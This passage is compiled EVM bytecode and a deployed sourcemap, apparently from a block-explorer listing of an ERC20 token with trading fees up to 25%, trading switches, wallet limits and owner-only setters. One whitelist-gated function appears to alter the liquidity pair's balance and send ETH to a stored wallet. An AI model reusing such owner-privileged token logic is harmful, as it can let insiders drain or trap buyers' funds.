20190508181036000830152614430816143f4565b9050919050565b7f616d6f756e742065786365656465640000000000000000000000000000000000600082015250565b600061446d600f83613c6c565b915061447882614437565b602082019050919050565b6000602082019050818103600083015261449c81614460565b9050919050565b600081905092915050565b50565b60006144be6000836144a3565b91506144c9826144ae565b600082019050919050565b60006144df826144b1565b9150819050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b6000614545603983613c6c565b9150614550826144e9565b604082019050919050565b6000602082019050818103600083015261457481614538565b9050919050565b7f4d757374206b656570206665657320617420323525206f72206c657373000000600082015250565b60006145b1601d83613c6c565b91506145bc8261457b565b602082019050919050565b600060208201905081810360008301526145e0816145a4565b9050919050565b60006145f282613d7f565b91506145fd83613d7f565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561463657614635614217565b5b828202905092915050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b600061469d602483613c6c565b91506146a882614641565b604082019050919050565b600060208201905081810360008301526146cc81614690565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e3030312520746f74616c20737570706c792e0000000000000000000000602082015250565b600061472f603583613c6c565b915061473a826146d3565b604082019050919050565b6000602082019050818103600083015261475e81614722565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206869676865722074686160008201527f6e20302e352520746f74616c20737570706c792e000000000000000000000000602082015250565b60006147c1603483613c6c565b91506147cc82614765565b604082019050919050565b600060208201905081810360008301526147f0816147b4565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000614853602683613c6c565b915061485e826147f7565b604082019050919050565b6000602082019050818103600083015261488281614846565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b60006148bf601b83613c6c565b91506148ca82614889565b602082019050919050565b600060208201905081810360008301526148ee816148b2565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000614951602483613c6c565b915061495c826148f5565b604082019050919050565b6000602082019050818103600083015261498081614944565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006149e3602283613c6c565b91506149ee82614987565b604082019050919050565b60006020820190508181036000830152614a12816149d6565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000614a75602583613c6c565b9150614a8082614a19565b604082019050919050565b60006020820190508181036000830152614aa481614a68565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000614b07602383613c6c565b9150614b1282614aab565b604082019050919050565b60006020820190508181036000830152614b3681614afa565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b6000614b73601683613c6c565b9150614b7e82614b3d565b602082019050919050565b60006020820190508181036000830152614ba281614b66565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b6000614c05603583613c6c565b9150614c1082614ba9565b604082019050919050565b60006020820190508181036000830152614c3481614bf8565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b6000614c97603683613c6c565b9150614ca282614c3b565b604082019050919050565b60006020820190508181036000830152614cc681614c8a565b9050919050565b6000614cd882613d7f565b9150614ce383613d7f565b925082614cf357614cf26141e8565b5b828206905092915050565b7f4552524f523a204d757374206265206c657373207468616e206d61785478416d60008201527f6f756e7400000000000000000000000000000000000000000000000000000000602082015250565b6000614d5a602483613c6c565b9150614d6582614cfe565b604082019050919050565b60006020820190508181036000830152614d8981614d4d565b9050919050565b6000614d9b82613d7f565b9150614da683613d7f565b925082821015614db957614db8614217565b5b828203905092915050565b60008160011c9050919050565b6000808291508390505b6001851115614e1b57808604811115614df757614df6614217565b5b6001851615614e065780820291505b8081029050614e1485614dc4565b9450614ddb565b94509492505050565b600082614e345760019050614ef0565b81614e425760009050614ef0565b8160018114614e585760028114614e6257614e91565b6001915050614ef0565b60ff841115614e7457614e73614217565b5b8360020a915084821115614e8b57614e8a614217565b5b50614ef0565b5060208310610133831016604e8410600b8410161715614ec65782820a905083811115614ec157614ec0614217565b5b614ef0565b614ed38484846001614dd1565b92509050818404811115614eea57614ee9614217565b5b81810290505b9392505050565b6000614f0282613d7f565b9150614f0d83613f7c565b9250614f3a7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484614e24565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050614faf81613d53565b92915050565b600060208284031215614fcb57614fca613d1c565b5b6000614fd984828501614fa0565b91505092915050565b6000819050919050565b6000615007615002614ffd84614fe2565b613e58565b613d7f565b9050919050565b61501781614fec565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61505281613d41565b82525050565b60006150648383615049565b60208301905092915050565b6000602082019050919050565b60006150888261501d565b6150928185615028565b935061509d83615039565b8060005b838110156150ce5781516150b58882615058565b97506150c083615070565b9250506001810190506150a1565b5085935050505092915050565b600060a0820190506150f06000830188613ed2565b6150fd602083018761500e565b818103604083015261510f818661507d565b905061511e6060830185613fb3565b61512b6080830184613ed2565b9695505050505050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b6000615191602183613c6c565b915061519c82615135565b604082019050919050565b600060208201905081810360008301526151c081615184565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220cc18661459d403a8112715b13164168829e0e4a01d6e8c789a72b162aa29745964736f6c634300080e0033
Deployed Bytecode Sourcemap
29448:13904:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7610:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9777:169;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30814:64;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29533:41;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8730:108;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37598:157;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30593:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30553;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;34912:255;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10428:355;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8572:93;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11192:218;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29581:28;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29870:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37769:125;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30404:28;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29950:31;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8901:127;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22075:148;;;;;;;;;;;;;:::i;:::-;;34123:121;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;35402:144;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;29677:30;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30293;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;35558:369;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;43118:229;;;;;;;;;;;;;:::i;:::-;;21433:79;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29714:24;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30439:31;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;36515:407;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7829:104;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;36930:244;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30367:24;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30633:27;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30515:25;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11913:269;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9241:175;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37378:208;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;31036:58;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29910:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;36325:182;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;35939:378;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;35175:215;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30172:40;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29751:35;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;34519:381;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30259:27;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9479:151;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29793:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;34309:135;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30330:30;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22378:244;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30477:31;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29833:24;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7610:100;7664:13;7697:5;7690:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7610:100;:::o;9777:169::-;9860:4;9877:39;9886:12;:10;:12::i;:::-;9900:7;9909:6;9877:8;:39::i;:::-;9934:4;9927:11;;9777:169;;;;:::o;30814:64::-;;;;;;;;;;;;;;;;;;;;;;:::o;29533:41::-;;;;;;;;;;;;;:::o;8730:108::-;8791:7;8818:12;;8811:19;;8730:108;:::o;37598:157::-;21655:12;:10;:12::i;:::-;21645:22;;:6;;;;;;;;;;;:22;;;21637:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;37705:9:::1;;;;;;;;;;;37677:38;;37694:9;37677:38;;;;;;;;;;;;37738:9;37726;;:21;;;;;;;;;;;;;;;;;;37598:157:::0;:::o;30593:33::-;;;;:::o;30553:::-;;;;:::o;34912:255::-;34998:15;;;;;;;;;;;34984:29;;:10;:29;;;34976:38;;;;;;35063:4;35047:13;:11;:13::i;:::-;:20;;;;:::i;:::-;35037:6;:30;;35029:90;;;;;;;;;;;;:::i;:::-;;;;;;;;;35153:6;35130:20;:29;;;;34912:255;:::o;10428:355::-;10568:4;10585:36;10595:6;10603:9;10614:6;10585:9;:36::i;:::-;10632:121;10641:6;10649:12;:10;:12::i;:::-;10663:89;10701:6;10663:89;;;;;;;;;;;;;;;;;:11;:19;10675:6;10663:19;;;;;;;;;;;;;;;:33;10683:12;:10;:12::i;:::-;10663:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;10632:8;:121::i;:::-;10771:4;10764:11;;10428:355;;;;;:::o;8572:93::-;8630:5;8655:2;8648:9;;8572:93;:::o;11192:218::-;11280:4;11297:83;11306:12;:10;:12::i;:::-;11320:7;11329:50;11368:10;11329:11;:25;11341:12;:10;:12::i;:::-;11329:25;;;;;;;;;;;;;;;:34;11355:7;11329:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;11297:8;:83::i;:::-;11398:4;11391:11;;11192:218;;;;:::o;29581:28::-;;;;;;;;;;;;;:::o;29870:33::-;;;;;;;;;;;;;:::o;37769:125::-;37834:4;37858:19;:28;37878:7;37858:28;;;;;;;;;;;;;;;;;;;;;;;;;37851:35;;37769:125;;;:::o;30404:28::-;;;;:::o;29950:31::-;;;;;;;;;;;;;:::o;8901:127::-;8975:7;9002:9;:18;9012:7;9002:18;;;;;;;;;;;;;;;;8995:25;;8901:127;;;:::o;22075:148::-;21655:12;:10;:12::i;:::-;21645:22;;:6;;;;;;;;;;;:22;;;21637:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;22182:1:::1;22145:40;;22166:6;;;;;;;;;;;22145:40;;;;;;;;;;;;22213:1;22196:6;;:19;;;;;;;;;;;;;;;;;;22075:148::o:0;34123:121::-;34175:4;21655:12;:10;:12::i;:::-;21645:22;;:6;;;;;;;;;;;:22;;;21637:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;34209:5:::1;34192:14;;:22;;;;;;;;;;;;;;;;;;34232:4;34225:11;;34123:121:::0;:::o;35402:144::-;21655:12;:10;:12::i;:::-;21645:22;;:6;;;;;;;;;;;:22;;;21637:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;35534:4:::1;35492:31;:39;35524:6;35492:39;;;;;;;;;;;;;;;;:46;;;;;;;;;;;;;;;;;;35402:144:::0;;:::o;29677:30::-;;;;;;;;;;;;;:::o;30293:::-;;;;:::o;35558:369::-;21655:12;:10;:12::i;:::-;21645:22;;:6;;;;;;;;;;;:22;;;21637:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;35692:13:::1;35674:15;:31;;;;35734:13;35716:15;:31;;;;35770:7;35758:9;:19;;;;35839:9;;35821:15;;35803;;:33;;;;:::i;:::-;:45;;;;:::i;:::-;35788:12;:60;;;;35883:2;35867:12;;:18;;35859:60;;;;;;;;;;;;:::i;:::-;;;;;;;;;35558:369:::0;;;:::o;43118:229::-;21655:12;:10;:12::i;:::-;21645:22;;:6;;;;;;;;;;;:22;;;21637:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;43189:4:::1;43175:11;;:18;;;;;;;;;;;;;;;;;;43227:4;43212:19;;:11;;;;;;;;;;;:19;;;43204:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;43265:5;43251:11;;:19;;;;;;;;;;;;;;;;;;43281:13;:11;:13::i;:::-;43310:29;43327:11;;;;;;;;;;;43310:29;;;;;;:::i;:::-;;;;;;;;43118:229::o:0;21433:79::-;21471:7;21498:6;;;;;;;;;;;21491:13;;21433:79;:::o;29714:24::-;;;;;;;;;;;;;:::o;30439:31::-;;;;:::o;36515:407::-;36568:4;36593:19;:31;36613:10;36593:31;;;;;;;;;;;;;;;;;;;;;;;;;36585:40;;;;;;36638:7;36648:24;36658:13;;;;;;;;;;;36648:9;:24::i;:::-;36638:34;;36698:1;36693:2;:6;:23;;;;;36713:3;36708:2;:8;;;;:::i;:::-;36703:2;:13;36693:23;36685:51;;;;;;;;;;;;:::i;:::-;;;;;;;;;36749:15;36761:2;36749:11;:15::i;:::-;36775:20;36792:2;36775:16;:20::i;:::-;36809:12;36834:15;;;;;;;;;;;36826:29;;36863:21;36826:63;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;36808:81;;;36907:7;36900:14;;;;36515:407;;;;:::o;7829:104::-;7885:13;7918:7;7911:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7829:104;:::o;36930:244::-;21655:12;:10;:12::i;:::-;21645:22;;:6;;;;;;;;;;;:22;;;21637:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;37037:13:::1;;;;;;;;;;;37029:21;;:4;:21;;::::0;37021:91:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;37125:41;37154:4;37160:5;37125:28;:41::i;:::-;36930:244:::0;;:::o;30367:24::-;;;;:::o;30633:27::-;;;;:::o;30515:25::-;;;;:::o;11913:269::-;12006:4;12023:129;12032:12;:10;:12::i;:::-;12046:7;12055:96;12094:15;12055:96;;;;;;;;;;;;;;;;;:11;:25;12067:12;:10;:12::i;:::-;12055:25;;;;;;;;;;;;;;;:34;12081:7;12055:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;12023:8;:129::i;:::-;12170:4;12163:11;;11913:269;;;;:::o;9241:175::-;9327:4;9344:42;9354:12;:10;:12::i;:::-;9368:9;9379:6;9344:9;:42::i;:::-;9404:4;9397:11;;9241:175;;;;:::o;37378:208::-;21655:12;:10;:12::i;:::-;21645:22;;:6;;;;;;;;;;;:22;;;21637:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;37515:15:::1;;;;;;;;;;;37472:59;;37495:18;37472:59;;;;;;;;;;;;37560:18;37542:15;;:36;;;;;;;;;;;;;;;;;;37378:208:::0;:::o;31036:58::-;;;;;;;;;;;;;;;;;;;;;;:::o;29910:33::-;;;;;;;;;;;;;:::o;36325:182::-;21655:12;:10;:12::i;:::-;21645:22;;:6;;;;;;;;;;;:22;;;21637:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;36441:8:::1;36410:19;:28;36430:7;36410:28;;;;;;;;;;;;;;;;:39;;;;;;;;;;;;;;;;;;36481:7;36465:34;;;36490:8;36465:34;;;;;;:::i;:::-;;;;;;;;36325:182:::0;;:::o;35939:378::-;21655:12;:10;:12::i;:::-;21645:22;;:6;;;;;;;;;;;:22;;;21637:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;36075:13:::1;36056:16;:32;;;;36118:13;36099:16;:32;;;;36155:7;36142:10;:20;;;;36227:10;;36208:16;;36189;;:35;;;;:::i;:::-;:48;;;;:::i;:::-;36173:13;:64;;;;36273:2;36256:13;;:19;;36248:61;;;;;;;;;;;;:::i;:::-;;;;;;;;;35939:378:::0;;;:::o;35175:215::-;21655:12;:10;:12::i;:::-;21645:22;;:6;;;;;;;;;;;:22;;;21637:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;35297:4:::1;35291;35287:1;35271:13;:11;:13::i;:::-;:17;;;;:::i;:::-;:24;;;;:::i;:::-;35270:31;;;;:::i;:::-;35260:6;:41;;35252:90;;;;;;;;;;;;:::i;:::-;;;;;;;;;35375:6;35365;:17;;;;:::i;:::-;35353:9;:29;;;;35175:215:::0;:::o;30172:40::-;;;;;;;;;;;;;:::o;29751:35::-;;;;:::o;34519:381::-;34600:4;21655:12;:10;:12::i;:::-;21645:22;;:6;;;;;;;;;;;:22;;;21637:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;34656:6:::1;34652:1;34636:13;:11;:13::i;:::-;:17;;;;:::i;:::-;:26;;;;:::i;:::-;34623:9;:39;;34615:105;;;;;;;;;;;;:::i;:::-;;;;;;;;;34771:4;34767:1;34751:13;:11;:13::i;:::-;:17;;;;:::i;:::-;:24;;;;:::i;:::-;34738:9;:37;;34730:102;;;;;;;;;;;;:::i;:::-;;;;;;;;;34863:9;34842:18;:30;;;;34889:4;34882:11;;34519:381:::0;;;:::o;30259:27::-;;;;:::o;9479:151::-;9568:7;9595:11;:18;9607:5;9595:18;;;;;;;;;;;;;;;:27;9614:7;9595:27;;;;;;;;;;;;;;;;9588:34;;9479:151;;;;:::o;29793:33::-;;;;:::o;34309:135::-;34369:4;21655:12;:10;:12::i;:::-;21645:22;;:6;;;;;;;;;;;:22;;;21637:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;34409:5:::1;34386:20;;:28;;;;;;;;;;;;;;;;;;34432:4;34425:11;;34309:135:::0;:::o;30330:30::-;;;;:::o;22378:244::-;21655:12;:10;:12::i;:::-;21645:22;;:6;;;;;;;;;;;:22;;;21637:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;22487:1:::1;22467:22;;:8;:22;;::::0;22459:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;22577:8;22548:38;;22569:6;;;;;;;;;;;22548:38;;;;;;;;;;;;22606:8;22597:6;;:17;;;;;;;;;;;;;;;;;;22378:244:::0;:::o;30477:31::-;;;;:::o;29833:24::-;;;;:::o;16477:181::-;16535:7;16555:9;16571:1;16567;:5;;;;:::i;:::-;16555:17;;16596:1;16591;:6;;16583:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;16649:1;16642:8;;;16477:181;;;;:::o;248:98::-;301:7;328:10;321:17;;248:98;:::o;15099:380::-;15252:1;15235:19;;:5;:19;;;15227:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15333:1;15314:21;;:7;:21;;;15306:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15417:6;15387:11;:18;15399:5;15387:18;;;;;;;;;;;;;;;:27;15406:7;15387:27;;;;;;;;;;;;;;;:36;;;;15455:7;15439:32;;15448:5;15439:32;;;15464:6;15439:32;;;;;;:::i;:::-;;;;;;;;15099:380;;;:::o;38093:3362::-;38241:1;38225:18;;:4;:18;;;38217:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;38318:1;38304:16;;:2;:16;;;38296:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;38387:1;38377:6;:11;38374:92;;38405:28;38421:4;38427:2;38431:1;38405:15;:28::i;:::-;38448:7;;38374:92;38489:14;;;;;;;;;;;38486:997;;;38549:7;:5;:7::i;:::-;38541:15;;:4;:15;;;;:49;;;;;38583:7;:5;:7::i;:::-;38577:13;;:2;:13;;;;38541:49;:86;;;;;38625:1;38611:16;;:2;:16;;;;38541:86;:128;;;;;38662:6;38648:21;;:2;:21;;;;38541:128;:158;;;;;38691:8;;;;;;;;;;;38690:9;38541:158;38519:953;;;38737:13;;;;;;;;;;;38733:148;;38782:19;:25;38802:4;38782:25;;;;;;;;;;;;;;;;;;;;;;;;;:52;;;;38811:19;:23;38831:2;38811:23;;;;;;;;;;;;;;;;;;;;;;;;;38782:52;38774:87;;;;;;;;;;;;:::i;:::-;;;;;;;;;38733:148;38950:25;:31;38976:4;38950:31;;;;;;;;;;;;;;;;;;;;;;;;;:71;;;;;38986:31;:35;39018:2;38986:35;;;;;;;;;;;;;;;;;;;;;;;;;38985:36;38950:71;38946:511;;;39068:20;;39058:6;:30;;39050:96;;;;;;;;;;;;:::i;:::-;;;;;;;;;38946:511;;;39240:25;:29;39266:2;39240:29;;;;;;;;;;;;;;;;;;;;;;;;;:71;;;;;39274:31;:37;39306:4;39274:37;;;;;;;;;;;;;;;;;;;;;;;;;39273:38;39240:71;39236:221;;;39358:20;;39348:6;:30;;39340:97;;;;;;;;;;;;:::i;:::-;;;;;;;;;39236:221;38946:511;38519:953;38486:997;39497:28;39528:24;39546:4;39528:9;:24::i;:::-;39497:55;;39573:12;39612:18;;39588:20;:42;;39573:57;;39661:7;:35;;;;;39685:11;;;;;;;;;;;39661:35;:61;;;;;39714:8;;;;;;;;;;;39713:9;39661:61;:110;;;;;39740:25;:31;39766:4;39740:31;;;;;;;;;;;;;;;;;;;;;;;;;39739:32;39661:110;:153;;;;;39789:19;:25;39809:4;39789:25;;;;;;;;;;;;;;;;;;;;;;;;;39788:26;39661:153;:194;;;;;39832:19;:23;39852:2;39832:23;;;;;;;;;;;;;;;;;;;;;;;;;39831:24;39661:194;39643:338;;;39893:4;39882:8;;:15;;;;;;;;;;;;;;;;;;39926:10;:8;:10::i;:::-;39964:5;39953:8;;:16;;;;;;;;;;;;;;;;;;39643:338;39993:12;40009:8;;;;;;;;;;;40008:9;39993:24;;40118:19;:25;40138:4;40118:25;;;;;;;;;;;;;;;;;;;;;;;;;:52;;;;40147:19;:23;40167:2;40147:23;;;;;;;;;;;;;;;;;;;;;;;;;40118:52;40115:99;;;40197:5;40187:15;;40115:99;40234:12;40338:7;40335:1067;;;40389:25;:29;40415:2;40389:29;;;;;;;;;;;;;;;;;;;;;;;;;:50;;;;;40438:1;40422:13;;:17;40389:50;40385:848;;;40466:34;40496:3;40466:25;40477:13;;40466:6;:10;;:25;;;;:::i;:::-;:29;;:34;;;;:::i;:::-;40459:41;;40567:13;;40548:16;;40541:4;:23;;;;:::i;:::-;:39;;;;:::i;:::-;40519:18;;:61;;;;;;;:::i;:::-;;;;;;;;40635:13;;40622:10;;40615:4;:17;;;;:::i;:::-;:33;;;;:::i;:::-;40599:12;;:49;;;;;;;:::i;:::-;;;;;;;;40715:13;;40696:16;;40689:4;:23;;;;:::i;:::-;:39;;;;:::i;:::-;40667:18;;:61;;;;;;;:::i;:::-;;;;;;;;40779:1;40774;40751:20;;:24;;;;:::i;:::-;:29;40747:81;;40782:46;;;;;;;;;;:::i;:::-;;;;;;;;40747:81;40385:848;;;40889:25;:31;40915:4;40889:31;;;;;;;;;;;;;;;;;;;;;;;;;:51;;;;;40939:1;40924:12;;:16;40889:51;40886:347;;;40965:33;40994:3;40965:24;40976:12;;40965:6;:10;;:24;;;;:::i;:::-;:28;;:33;;;;:::i;:::-;40958:40;;41061:12;;41043:15;;41036:4;:22;;;;:::i;:::-;:37;;;;:::i;:::-;41014:18;;:59;;;;;;;:::i;:::-;;;;;;;;41127:12;;41115:9;;41108:4;:16;;;;:::i;:::-;:31;;;;:::i;:::-;41092:12;;:47;;;;;;;:::i;:::-;;;;;;;;41205:12;;41187:15;;41180:4;:22;;;;:::i;:::-;:37;;;;:::i;:::-;41158:18;;:59;;;;;;;:::i;:::-;;;;;;;;40886:347;40385:848;41271:1;41264:4;:8;41261:93;;;41296:42;41312:4;41326;41333;41296:15;:42::i;:::-;41261:93;41386:4;41376:14;;;;;:::i;:::-;;;40335:1067;41414:33;41430:4;41436:2;41440:6;41414:15;:33::i;:::-;38206:3249;;;;38093:3362;;;;:::o;17380:192::-;17466:7;17499:1;17494;:6;;17502:12;17486:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;17526:9;17542:1;17538;:5;;;;:::i;:::-;17526:17;;17563:1;17556:8;;;17380:192;;;;;:::o;42994:70::-;43052:4;43036:13;;:20;;;;;;;;;;;;;;;;;;42994:70::o;37906:179::-;37963:67;37973:13;;;;;;;;;;;37996:4;38019:10;:8;:10::i;:::-;38013:2;:16;;;;:::i;:::-;38003:7;:26;;;;:::i;:::-;37963:9;:67::i;:::-;38056:13;;;;;;;;;;;38041:34;;;:36;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;37906:179;:::o;41463:601::-;41591:21;41629:1;41615:16;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;41591:40;;41660:4;41642;41647:1;41642:7;;;;;;;;:::i;:::-;;;;;;;:23;;;;;;;;;;;41686:15;;;;;;;;;;;:20;;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;41676:4;41681:1;41676:7;;;;;;;;:::i;:::-;;;;;;;:32;;;;;;;;;;;41721:62;41738:4;41753:15;;;;;;;;;;;41771:11;41721:8;:62::i;:::-;41822:15;;;;;;;;;;;:66;;;41903:11;41929:1;41973:4;42000;42020:15;41822:224;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;41518:546;41463:601;:::o